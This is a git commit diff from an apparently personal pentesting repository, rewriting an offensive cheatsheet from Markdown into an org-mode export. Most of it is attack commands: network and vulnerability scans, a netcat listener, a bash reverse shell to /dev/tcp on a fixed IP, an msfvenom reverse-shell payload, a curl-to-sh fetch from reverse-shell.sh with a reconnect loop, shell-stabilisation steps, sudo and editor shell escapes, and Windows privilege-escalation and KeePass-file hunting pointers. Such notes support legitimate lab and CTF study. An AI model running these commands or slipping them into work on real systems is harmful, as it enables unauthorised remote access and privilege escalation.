Rh17S15/pentesting
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Testing new org mode cheatsheet

Browse Source
This commit is contained in:
Rh17S15
2025-07-27 02:13:51 +02:00
parent c6fc483b8a
commit 1d8f631216
1 changed files with 275 additions and 136 deletions
Download Patch File Download Diff File Expand all files Collapse all files

411
Cheatsheet.md
View File

@@ -1,200 +1,339 @@
#### to install:
- magic wormhole
- tldr
- rlwrap
-
```bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
```
#### for keyring
-> if there is some kind of keyring error
```bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
```
# Table of Contents
1. [information gathering](#org852ec36)
1. [nmap](#orgda1065c)
2. [dirb](#orgafbfb19)
2. [inital access](#orgd5250d9)
1. [start listener:](#orgefad80b)
2. [reverse shell bash:](#org147daab)
3. [reverse shell file:](#org32886e3)
4. [untested:](#org6c097fc)
3. [privilege escalation](#org6812526)
1. [always run these:](#org0b25bb0)
2. [TTY Spawn Shell](#org4152682)
1. [Python spawn shell](#orgf659bfd)
2. [OS system spawn shell](#org76c29ea)
3. [Bash spawn shell](#org80d5744)
4. [Perl spawn shell](#orgd4f31f3)
5. [Ruby spawn shell](#org2fe4e07)
6. [Lua spawn shell](#orgce64187)
7. [IRB spawn shell](#org28402e0)
8. [VI spawn shell](#org6bfa44c)
9. [VI(2) spawn shell](#org4241f95)
10. [Nmap spawn shell](#org5dc86b6)
4. [Windows](#orgdcc9f31)
1. [WinPEAS](#org21afc9d)
2. [LOLBAS](#org08b790e)
3. [WADCOMS](#orgb12dcff)
4. [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
5. [RUN these while the other scripts are working](#orgea4f773)
6. [for finding kbdx Files](#org0f35200)
1. to install:
- magic wormhole
- tldr
- rlwrap
-
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
2. for keyring
-> if there is some kind of keyring error
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
<a id="org852ec36"></a>
# information gathering
<a id="orgda1065c"></a>
### nmap
for quick scan of available ips
```bash
nmap -sn ip/24
```
nmap -sn ip/24
to filter output for open ips
```bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports:
```bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```
#### bei windows
```bash
nmap --vuln ip
```
##### bei windows \+ smb
```bash
nmap --script vuln-smb* ip
nicht mehr sicher welches es war
nmap --script smb-vuln* ip
```
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
<a id="orgafbfb19"></a>
### dirb
dirb http://ip
1. bei windows
nmap --vuln ip
1. bei windows \\+ smb
nmap --script smb-vuln* ip
<a id="orgd5250d9"></a>
# inital access
<a id="orgefad80b"></a>
### start listener:
```bash
rlwrap -cAr nc -nlvp 9002
```
rlwrap -cAr nc -nlvp 9002
<a id="org147daab"></a>
### reverse shell bash:
```bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
<a id="org32886e3"></a>
### reverse shell file:
```bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-> from revshells.com
<a id="org6c097fc"></a>
### untested:
Reverse Shell as a Service
1. On your machine:
```bash
nc -l 1337
or nlvp?
```
Reverse Shell as a Service
2. On the target machine:
```bash
curl https://reverse-shell.sh/yourip:1337 | sh
```
1. On your machine:
nc -l 1337
or nlvp?
1. On the target machine:
curl https://reverse-shell.sh/yourip:1337 | sh
1. reconnecting:
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#### reconnecting:
```bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
```
<a id="org6812526"></a>
# privilege escalation
### always run these:
```bash
sudo -l
```
if sudo doesn't work:
[[#^78d3ce|spawn shell]]
#### check cronjobs
```bash
ls /etc/cron.*
crontab -l
```
<a id="org0b25bb0"></a>
## always run these:
sudo -l
if sudo doesn&rsquo;t work:
[3.2](#org4152682)
1. check cronjobs
ls /etc/cron.*
crontab -l
<a id="org4152682"></a>
## TTY Spawn Shell
##### if sudo still doesn't work
use
```bash
sudo -S command
```
1. if sudo still doesn&rsquo;t work
use
sudo -S command
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
<a id="orgf659bfd"></a>
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
python -c 'import pty; pty.spawn("/bin/bash")'
Fully Interactive TTY
#### All the steps to stabilize your shell
**The first step:**
1. All the steps to stabilize your shell
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
****The first step:****
python3 -c 'import pty;pty.spawn("/bin/bash")'
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
****Step two is:****
export TERM=xterm
This will give us access to term commands such as clear.
****Finally (and most importantly) we will background the shell using****
Ctrl + Z
Back in our own terminal we use
stty raw -echo; fg
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
stty rows 38 columns 116
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still wont be able to use tab autocomplete or the arrow keys.
**Step two is:**
```bash
export TERM=xterm
```
<a id="org76c29ea"></a>
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
```bash
Ctrl + Z
```
Back in our own terminal we use
```bash
stty raw -echo; fg
```
This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
```bash
stty rows 38 columns 116
```
### OS system spawn shell
```bash
echo os.system("/bin/bash")
```
echo os.system("/bin/bash")
<a id="org80d5744"></a>
### Bash spawn shell
```bash
/bin/sh -i
```
/bin/sh -i
<a id="orgd4f31f3"></a>
### Perl spawn shell
```bash
perl —e 'exec "/bin/sh";'
```
perl —e 'exec "/bin/sh";'
<a id="org2fe4e07"></a>
### Ruby spawn shell
ruby: exec "/bin/sh"
ruby: exec &ldquo;/bin/sh&rdquo;
<a id="orgce64187"></a>
### Lua spawn shell
lua: os.execute("/bin/sh")
lua: os.execute(&ldquo;/bin/sh&rdquo;)
<a id="org28402e0"></a>
### IRB spawn shell
exec "/bin/sh"
exec &ldquo;/bin/sh&rdquo;
<a id="org6bfa44c"></a>
### VI spawn shell
```bash
:!bash
```
:!bash
<a id="org4241f95"></a>
### VI(2) spawn shell
```bash
:set shell=/bin/bash:shell
```
:set shell=/bin/bash:shell
<a id="org5dc86b6"></a>
### Nmap spawn shell
```bash
!sh
```
!sh
#### Exiftools
1. Exiftools
Metadaten auslesen:
Metadaten auslesen:
exiftool picture.png
Binwalk (Binary Daten exportieren):
binwalk -e picture.png
```bash
exiftool picture.png
```
Binwalk (Binary Daten exportieren):
<a id="orgdcc9f31"></a>
# Windows
<a id="org21afc9d"></a>
### WinPEAS
<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>
<a id="org08b790e"></a>
### LOLBAS
<https://lolbas-project.github.io/>#
<a id="orgb12dcff"></a>
### WADCOMS
<https://wadcoms.github.io/>
<a id="org2bed5cd"></a>
### PrivescCheck Script as an alternative to WinPEAS
<https://github.com/itm4n/PrivescCheck>
<a id="orgea4f773"></a>
### RUN these while the other scripts are working
whoami /priv
whoami /all
schtasks /query
<a id="org0f35200"></a>
### for finding kbdx Files
<https://github.com/ivanmrsulja/keepass2john>
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;
evilwinrm
quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;
```bash
binwalk -e picture.png
```